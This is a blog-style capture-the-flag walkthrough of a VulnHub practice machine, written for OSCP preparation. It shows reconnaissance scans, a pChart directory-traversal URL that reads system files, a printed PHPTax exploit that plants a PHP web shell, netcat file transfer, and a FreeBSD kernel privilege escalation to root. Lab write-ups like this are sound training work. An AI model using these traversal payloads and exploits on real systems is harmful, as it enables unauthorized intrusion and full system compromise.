The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. This machine is the next on list and it can be downloaded on: vulnhub

The challenge

The challenge or goal of the machine lists the following:

Get root

Walk-through

The walk-through will be divided in a couple sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for complicity we do these three.

Information gathering

To start of we will find the IP address of the machine with nmap since netdiscover takes a while on my VMware. We will use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP 192.168.0.135.

So to start of the machine we scan the machine for open ports with nmap. We will do two scans; sudo nmap -sV -sC 192.168.0.135 -oA nmap and sudo nmap -sV -sC -p- 192.168.0.135 -oA fullnmap. We use these parameters for;
-sV service and version enumeration,
-sC is for basic script usage.
-p- to do a full port scan.
-oA to save all output to a couple different files.

The nmap results are;

So we got port 22 ssh, which is closed. Port 80 and 8080 both running a webserver. Lets have a manual look in our browser if these are the same or different websites. Port 80 says IT WORKS! and port 8080 gives us a forbidden message.

Seems like we need to find some other directories on this website. Lets use Nikto for vulnerability scanning and dirb for directory bruteforcing. We will use nikto -host http://192.168.0.135 -output nikto.txt and dirb http://192.168.0.135 -o dirb.txt. No special parameters, just the normal lists and save the output to a file so we can see the results later if needed. Next to it we run the same command with the address http://192.168.0.135:8080 so we can the port 8080.

Results for port 80

Results for port 8080:

/cgi/bin is on both ports not available on since we get an forbidden error. We can not view this page. There aren’t really any other directories. To be sure we will run another dirb with a bigger wordlist. dirb http://192.168.0.135 /usr/share/dirb/wordlists/big.txt. While this is running lets have a look at the line that Nikto gave us: mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Exploitation

If we use searchsploit modssl to find a vulnerability he lists a couple who might work, The openFuck payloads.

Lets copy the exploit code and view its contents: searchsploit -m exploits/unix/remote/21671.c Then we can rename it to OpenFuck.c and compile it with gcc -o OpenFuck OpenFuck.c -lcrypto. Unfortunatelly this didn’t work since I need to install libssl-dev. apt-get install libssl-dev and then reran the gcc command and got a lot more errors. I tried the first OpenFuckV2.c exploit and got the same errors, the second OpenfuckV2.c exploit worked. (The 47080.c from searchsploit). We could compile it!

After running the code it prints out the usage. (Run it with ./OpenFuck.

So lets go back to our Nmap scan to see if we can see what Linux distro and version it is. It should be FreeBSD apache2.2.9? This isn’t listed in the options we have for FreeBSD they are all apache 1.3.xxx. Lets try one i guess. I tried a couple but it doesn’t seem to be working for me. Nikto might had it wrong.

Information Gathering

Back to information gatchering lets look at the source code in the website. Maybe there is a flag or a hint hidden.

If we go to http://192.168.0.135/pChart2.1.3/index.php we go to http://192.168.0.135/pChart2.1.3/examples/index.php which looks like some charting software as the name implies.

Searchsploit tells us there are multiple vulnerabilities in pchart, they are all written in a file named 31173.txt. Lets copy this file and read it!

The first interesting vulnerability it lists is a directory traversal.

Exploitation

Lets copy the path travelsar and paste is in our URL so we get http://192.168.0.135/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd. And we see the contents of /etc/passwd.

There are some users, but they all have nologin. No wonder ssh is closed, no need to log in on it :p. There is a toor and root user tho. Might be interesting later. We need to find some more interesting files, like apache configuration files. Lets google on where to find them! I tried the following locations but could not find anything:

  • /etc/apache2/httpd.conf
  • /etc/apache2/apache2.conf
  • /etc/httpd/httpd.conf
  • /etc/httpd/conf/httpd.conf
  • /apache2.conf
  • /httpd.conf
  • /../apache2.conf
  • /../httpd.conf

Then I came onto this link stating that apache conf is under /usr/local/etc/apache2x/httpd.conf where the x is the version. We had apache 2.2 so this should be apache22? http://192.168.0.135/pChart2.1.3/examples/index.php?Action=View&Script=/../../usr/local/etc/apache22/httpd.conf. Bingo! we got access to the apache.conf. There is only one special thing about this configuration:

We need to set our user-agent to Mozilla/4.0 Mozilla4_browser. We can set this with an addon called User-Agent Switcher. We can set a custom user agent and go to the port8080 webpage.

We see a PHPtax application from the USA? Never seen it before and it looks weird. But lets do a searchsploit and google to see if there is any known vulnerabilities. Should be. Searchsploit phptax

Lets copy the text file and read its contents. There is a metasploit module but I rather not use it. In the txt file there is an exploit code in the PHP language. It shows us the following:

<?php

$options = getopt('u:');

if(!isset($options['u']))
die("\n        Usage example: php exploit.php -u http://target.com/ \n");

$url     =  $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Content-Type: text/plain');

echo "        [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$url}/data/rce.php?cmd=id\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}

?>

After running the exploit we got an error since we didn’t had php-curl. Googled and we could install it with sudo apt-get install php-curl. So I ran the exploit code again and we got an error:

Maybe we have to change the browser agent, but wait… I dont think I directed to the /phptax/ directory. Fail! After fooling around and changing stuff here and there It didn’t work. So I checked the other exploit from exploitdb and still no luck. I started msfconsole and use exploit/multi/http/phptax_exec. Set the right options and it worked. We got a shell as www-data.

Privilege escalation

Now its time to do a privilege escalation.There is no home directories, no processes running as root and no wget. But there is netcat.It is running uname -mrs FreeBSD 9.0-RELEASE amd64. Lets try to find a kernal exploit, since i’m not able to find anything else with the priv escalation guide.

Lets cope the first one with searchsploit -m 28718.c. We can not drop it with wget since there is none. We have to use nc. After some fooling around I found out that the 28718.c I was trying to transfer had overwritten hisself with nothing so I was trying to transfer an empty file and was confused on why the file transfered was empty. Epic fail!

Eventually I transfered the file with nc -lvp 3000 < 26368.c and nc 192.168.0.129 3000 > exploit2.c. You might be wondering but this is another exploit. Yes! The first one didn’t work for me when I ran it I got some core errors. So I tried the second one and this one worked! we compiled the second exploit with gcc -o exploit2 exploit2.c and then we did id and we are root! The flag was in the /root/directory!

Flag

Leave a Reply

Your email address will not be published. Required fields are marked *